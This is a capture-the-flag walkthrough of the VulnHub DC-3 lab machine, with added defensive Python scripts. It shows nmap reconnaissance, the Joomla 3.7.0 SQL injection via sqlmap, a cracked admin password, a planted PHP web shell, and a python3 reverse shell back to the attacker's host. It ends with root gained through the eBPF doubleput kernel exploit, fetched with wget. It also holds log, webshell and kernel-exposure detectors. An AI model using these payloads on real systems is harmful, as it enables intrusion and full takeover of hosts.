
DC-3 Target Machine Penetration Test

Target machine: https://www.vulnhub.com/entry/dc-32,312/
Difficulty: low
Goal: obtain root privileges and the flag

DC-3 is a penetration-testing target machine published on VulnHub, intended for practising web application security and penetration-testing skills. Its distinguishing feature is that only port 80 is open, serving an Apache web server and the Joomla CMS, which makes it suitable for beginners practising basic techniques such as information gathering, vulnerability scanning and privilege escalation.

Environment setup: download the DC-3 image (e.g. DC-3.zip) from the VulnHub site or a mirror and unpack it into VMware alongside the attacking Kali VM. Networking: put the target and the attacker on the same NAT or bridged network so that they share a LAN. IP: sweep the subnet with nmap (e.g. 192.168.96.128/24) to determine the target's real IP (e.g. 192.168.96.131) and the attacker's IP (e.g. 192.168.96.128).

Penetration steps. Information gathering: run a full nmap port and service scan, confirm that port 80 is open and identify the Apache/Joomla stack. Open the target IP in a browser (e.g. http://192.168.96.131) and look for hints on the front page. Vulnerability scanning: install JoomScan (from the Kali package manager) and run it against the Joomla CMS to find the admin path (e.g. /administrator/); use nikto to scan for web vulnerabilities or misconfigurations. Privilege escalation: try weak-credential logins to the admin panel or known Joomla vulnerabilities (component bugs, misconfigurations) to obtain administrator access; if that does not work, fall back on the usual approaches such as file upload or SQL injection.

Notes: this machine is deliberately simple and mainly tests basic penetration skills, so using tools (nmap, JoomScan, nikto) is recommended over purely manual work. To raise the difficulty, try turning off the hints or taking a different attack path.

Related reference: https://developer.aliyun.com/article/1362873

Information Gathering

Host discovery

1. Check the local subnet

ifconfig
192.168.65.132
The attacking host is on the 192.168.65.0 subnet.

2. Host discovery

└─# nmap -sn 192.168.65.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.147
Host is up (0.00017s latency).
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.0049s latency).
MAC Address: 00:50:56:F5:D2:FC (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds

Knowing the layout of my own lab network (192.168.65.132 is the attacking machine), the target must be

192.168.65.147

3. Port scan

└─# nmap -sT --min-rate 10000 -p- 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT
Nmap scan report for 192.168.65.147
Host is up (0.0017s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

TCP service and OS scan

└─# nmap -sT -sV -sC -O -p80 192.168.65.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT
Nmap scan report for 192.168.65.147
Host is up (0.00042s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
MAC Address: 00:0C:29:4E:5A:03 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds

Analysis

Host status
IP: 192.168.65.147
State: up, latency 0.42 ms
MAC: 00:0C:29:4E:5A:03 (VMware virtual machine)
Port/service
80/tcp open
Service: http
Software: Apache httpd 2.4.18 (Ubuntu)
CMS: Joomla! (open-source content management system)
Page title: Home
Server header: Apache/2.4.18 (Ubuntu)
OS fingerprint
OS type: Linux 3.x – 4.x (most likely Ubuntu 16.04 with kernel 4.4)
Network
Distance: 1 hop (same subnet)
Suggested next steps
Web attack surface: the Joomla 3.x admin panel is at /administrator by default; use joomscan or joomla-cves to scan for known vulnerabilities.
Directory brute force: run gobuster/dirb against http://192.168.65.147/ to look for backups, configuration files and upload points.
Getting a shell: if the Joomla version is ≤ 3.4.6, try the CVE-2015-8562 deserialization bug; if ≤ 3.7.0, try the CVE-2017-8917 SQL injection.

UDP scan

nmap -sU --top-ports 20 192.168.65.147

[screenshot: UDP scan output]

Default vulnerability script scan

nmap --script=vuln -p80 192.168.65.147
Nothing is found.

Web Penetration

Opened in a browser, the site looks like this:

[screenshot: Joomla front page]

There are no leads there, so we try the directory brute force mentioned earlier.

Directory brute force

dirsearch -u http://192.168.65.147

[screenshot: dirsearch output]

We find

/administrator/

[screenshot: Joomla administrator login page]

Looking up known vulnerabilities

Start with joomscan.

1. JoomScan is an open-source vulnerability scanner written specifically for the Joomla CMS.

On Kali it installs directly from the package manager:

sudo apt update && sudo apt install joomscan

Basic usage

# basic scan
joomscan -u http://192.168.65.147
# also enumerate components
joomscan -u http://192.168.65.147 --enumerate-components
# scan through a proxy
joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080

[screenshot: joomscan output]

The scan reveals the Joomla version (3.7.0).

Searching for exploits

searchsploit Joomla 3.7.0

[screenshot: searchsploit results]

There is an SQL injection; let's copy the document and read it.

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .
└─# cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

We use sqlmap to try the injection:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

We find the joomladb database and list its tables:

└─# sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

[screenshot: sqlmap table listing]

Then query the users table directly for the account and password:

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

[screenshot: sqlmap column listing]

Retrieve the username and password hash

sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump

[screenshot: sqlmap dump output]

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
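From the defender's side, the requests above leave a clear trace in the Apache access log: a com_fields request whose list[fullordering] value is anything other than the "column ASC|DESC" string Joomla itself generates. The following added example (not part of the original write-up; the log lines, the whitelist regex for a legitimate ordering value, and the log format regex are all constructed assumptions) parses combined-format access log lines and flags such requests, including the updatexml probe and the time-based payload quoted from 42033.txt. Upgrading Joomla to 3.7.1 or later removes the bug itself.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, reduced to the fields this check needs
# (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Joomla builds list[fullordering] as "<column> ASC" or "<column> DESC",
# e.g. "a.ordering ASC".  This whitelist is our assumption about that shape,
# not Joomla's own input validation; anything else reaching com_fields is
# treated as a CVE-2017-8917 probe.
VALID_ORDERING = re.compile(r'^[A-Za-z0-9_.]+\s+(?:ASC|DESC)$', re.IGNORECASE)


def is_suspicious_request(target: str) -> bool:
    """True when a request URL looks like a CVE-2017-8917 injection attempt."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get('option', [''])[0] != 'com_fields':
        return False  # the vulnerable code path is in com_fields only
    # parse_qs already percent-decodes both keys and values, so the encoded
    # key list%5Bfullordering%5D is seen here as list[fullordering].
    values = query.get('list[fullordering]', [])
    return any(not VALID_ORDERING.match(v.strip()) for v in values)


def scan_log(lines) -> list:
    """Return one record per suspicious request found in the log lines."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_suspicious_request(m['target']):
            hits.append({'ip': m['ip'], 'ts': m['ts'],
                         'status': int(m['status']), 'target': m['target']})
    return hits


# Constructed sample log: two injection probes from one client, one
# legitimate ordering request and one unrelated request.
SAMPLE_LOG = """\
192.168.65.132 - - [17/Oct/2025:15:55:07 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1264
192.168.65.10 - - [17/Oct/2025:15:55:09 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.ordering%20ASC HTTP/1.1" 200 8821
192.168.65.132 - - [17/Oct/2025:15:55:12 -0400] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GDiu) HTTP/1.1" 200 8821
192.168.65.10 - - [17/Oct/2025:15:55:15 -0400] "GET /administrator/ HTTP/1.1" 200 4410
"""

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} {hit['target']}")
```

The check is deliberately scoped to option=com_fields because that is the component the advisory names; a broader rule that drops the option test would also catch the same payload sent to other components, at the cost of more false positives on extensions that accept free-form ordering strings.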

Crack the hash

[screenshot: hash cracking]

The password is

snoopy

[screenshot]

Reverse Shell

[screenshot]

[screenshot]

Create a new file

[screenshot]

Write a one-line PHP web shell into it

<?php system($_GET['cmd']);?>

Request the path

/templates/protostar/shell.php?cmd=id

[screenshot: output of id]
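The file dropped into the protostar template directory is exactly what a Joomla administrator should be looking for after an incident: a PHP file that is not part of the installed template and that passes request data straight into a command-execution function. The following added example (not code from the write-up; the template file contents, the baseline file list and the detection patterns are all constructed assumptions) shows both checks over an in-memory copy of a template directory, plus a helper that collects real files when run on a server.

```python
import re
from pathlib import Path

# Heuristic: a dangerous call whose argument list reads directly from a
# request superglobal, e.g. system($_GET['cmd']).  Patterns are ours.
WEBSHELL_RE = re.compile(
    r'\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)'
    r'\s*\([^;]*?\$_(?:GET|POST|REQUEST|COOKIE)\b',
    re.IGNORECASE,
)


def find_webshell_indicators(files: dict) -> list:
    """files maps path -> file text; returns (path, matched snippet) pairs."""
    hits = []
    for path, text in files.items():
        for m in WEBSHELL_RE.finditer(text):
            hits.append((path, m.group(0)))
    return hits


def new_files(files: dict, baseline: set) -> list:
    """Paths present now that were not recorded in the install-time baseline."""
    return sorted(p for p in files if p not in baseline)


def collect_php_files(root: Path) -> dict:
    """Build the same path -> text mapping from a real template directory."""
    return {str(p.relative_to(root)): p.read_text(errors='replace')
            for p in root.rglob('*.php')}


# Constructed sample directory: two ordinary Joomla template files and the
# one-liner from this write-up.
SAMPLE_FILES = {
    "templates/protostar/index.php":
        "<?php\ndefined('_JEXEC') or die;\n$app = JFactory::getApplication();\n",
    "templates/protostar/error.php":
        "<?php\ndefined('_JEXEC') or die;\necho $this->error->getMessage();\n",
    "templates/protostar/shell.php":
        "<?php system($_GET['cmd']);?>",
}

# Constructed baseline, as if recorded right after installation.
BASELINE = {"templates/protostar/index.php", "templates/protostar/error.php"}

if __name__ == '__main__':
    for path, snippet in find_webshell_indicators(SAMPLE_FILES):
        print(f"indicator in {path}: {snippet}")
    for path in new_files(SAMPLE_FILES, BASELINE):
        print(f"file not in baseline: {path}")
```

The two checks complement each other: the pattern match catches the obvious one-liner but can be evaded by obfuscation, whereas the baseline comparison catches any unexpected file regardless of content but needs an inventory taken before the compromise (Joomla's own manifest, or a checksum list kept off-box, serves that purpose).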

Check whether python3 is available

which python3

[screenshot: which python3 output]

A path is returned, so python3 is present.

Build the reverse shell

python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

The connection comes back successfully.

[screenshot: reverse shell connected]

[screenshot]

Privilege Escalation

Check the system version

www-data@DC-3:/var/www/html/templates/protostar$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial

Looking up known vulnerabilities

searchsploit Ubuntu 16.04

[screenshot: searchsploit results]

linux/local/39772.txt

First copy the file out

cp /usr/share/exploitdb/exploits/linux/local/39772.txt .
└─# cat 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

/* look for pseudo eBPF instructions that access map FDs and
 * replace them with actual map pointers
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
        struct bpf_insn *insn = env->prog->insnsi;
        int insn_cnt = env->prog->len;
        int i, j;

        for (i = 0; i < insn_cnt; i++, insn++) {
                [checks for bad instructions]
                if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                        struct bpf_map *map;
                        struct fd f;
                        [checks for bad instructions]
                        f = fdget(insn->imm);
                        map = __bpf_map_get(f);
                        if (IS_ERR(map)) {
                                verbose("fd %d is not pointing to valid bpf_map\n",
                                        insn->imm);
                                fdput(f);
                                return PTR_ERR(map);
                        }
                        [...]
                }
        }
        [...]
}

__bpf_map_get contains the following code:

/* if error is returned, fd is released.
 * On success caller should complete fd access with matching fdput()
 */
struct bpf_map *__bpf_map_get(struct fd f)
{
        if (!f.file)
                return ERR_PTR(-EBADF);
        if (f.file->f_op != &bpf_map_fops) {
                fdput(f);
                return ERR_PTR(-EINVAL);
        }
        return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.

There are two problems with this approach:

The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
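The advisory's opening paragraph states the three preconditions for this bug precisely: a kernel at or above 4.4, CONFIG_BPF_SYSCALL enabled, and kernel.unprivileged_bpf_disabled not set to 1. That makes the exposure check on a fleet of Ubuntu 16.04-era hosts mechanical. The following added example (not part of the write-up or of the 39772 package; the function names, the field layout and the sample inputs are my own assumptions) encodes those conditions and reads the live values from /proc and /boot when run on a host. The result only says whether the advisory's preconditions hold: a distribution kernel that still reports 4.4.0 may already carry the fix commit listed above, so the verdict is a reason to check patch level and to set the sysctl, not proof that the exploit works.

```python
import re
from pathlib import Path
from typing import Optional

# Lower bound named in the advisory ("In Linux >=4.4 ...").
MIN_KERNEL = (4, 4)
SYSCTL_PATH = Path('/proc/sys/kernel/unprivileged_bpf_disabled')


def parse_kernel_version(uname_r: str) -> tuple:
    """Turn a `uname -r` string such as '4.4.0-21-generic' into (4, 4, 0)."""
    m = re.match(r'^(\d+)\.(\d+)(?:\.(\d+))?', uname_r.strip())
    if not m:
        raise ValueError(f'unrecognised kernel release string: {uname_r!r}')
    return tuple(int(part or 0) for part in m.groups())


def bpf_doubleput_exposure(uname_r: str,
                           unprivileged_bpf_disabled: Optional[int],
                           bpf_syscall_enabled: Optional[bool] = None) -> dict:
    """Evaluate the advisory's three preconditions for one host.

    unprivileged_bpf_disabled: the sysctl value, or None when the file is
    absent.  bpf_syscall_enabled: CONFIG_BPF_SYSCALL from the kernel config,
    or None when the config is not available; the sysctl file only exists
    when the bpf() syscall is compiled in, so its presence is used as a
    fallback indicator.
    """
    version = parse_kernel_version(uname_r)
    kernel_in_range = version[:2] >= MIN_KERNEL
    if bpf_syscall_enabled is None:
        bpf_syscall_enabled = unprivileged_bpf_disabled is not None
    # 0 allows unprivileged bpf(); 1 disables it (newer kernels also accept
    # 2, which disables it as well), so only 0 satisfies the advisory.
    unprivileged_bpf_allowed = unprivileged_bpf_disabled == 0
    exposed = kernel_in_range and bpf_syscall_enabled and unprivileged_bpf_allowed
    return {
        'kernel': '.'.join(map(str, version)),
        'kernel_in_range': kernel_in_range,
        'bpf_syscall_enabled': bpf_syscall_enabled,
        'unprivileged_bpf_allowed': unprivileged_bpf_allowed,
        'exposed': exposed,
        'mitigation': ('sysctl -w kernel.unprivileged_bpf_disabled=1 (persist it in '
                       '/etc/sysctl.d) and move to a kernel that includes commit '
                       '8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7') if exposed else None,
    }


def read_live_values() -> Optional[dict]:
    """Collect the inputs from the running Linux host; None if not on Linux."""
    try:
        release = Path('/proc/sys/kernel/osrelease').read_text().strip()
    except OSError:
        return None
    sysctl = int(SYSCTL_PATH.read_text()) if SYSCTL_PATH.exists() else None
    config = Path(f'/boot/config-{release}')
    bpf_syscall = ('CONFIG_BPF_SYSCALL=y' in config.read_text()) if config.exists() else None
    return {'uname_r': release, 'unprivileged_bpf_disabled': sysctl,
            'bpf_syscall_enabled': bpf_syscall}


if __name__ == '__main__':
    live = read_live_values()
    # Constructed fallback: the DC-3 box (4.4.0-21, Ubuntu 16.04 defaults).
    inputs = live or {'uname_r': '4.4.0-21-generic',
                      'unprivileged_bpf_disabled': 0, 'bpf_syscall_enabled': True}
    for key, value in bpf_doubleput_exposure(**inputs).items():
        print(f'{key}: {value}')
```

On a host where the sysctl is already 1, the function reports the kernel as in range but not exposed, which is the intended reading: the advisory itself names the sysctl as the condition that switches the bug off for unprivileged users.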

Download the archive

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

Serve it from the Kali host

python -m http.server 80

Fetch it on the target and unpack it

wget http://192.168.65.132/39772.zip
unzip 39772.zip
tar -xf exploit.tar

Exploitation

The .txt file already gives the usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput

www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
   .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
   .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh  doubleput  doubleput.c  hello  hello.c  suidhelper  suidhelper.c
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput

The two compiler warnings are expected on this i686 (32-bit) system, as uname showed: a 32-bit pointer is being widened into a 64-bit field, which is harmless here.

Upgrade to an interactive shell

python -c "import pty;pty.spawn('/bin/bash')"

[screenshot: root shell]

Rooted.

http://www.hskmm.com/?act=detail&tid=33118
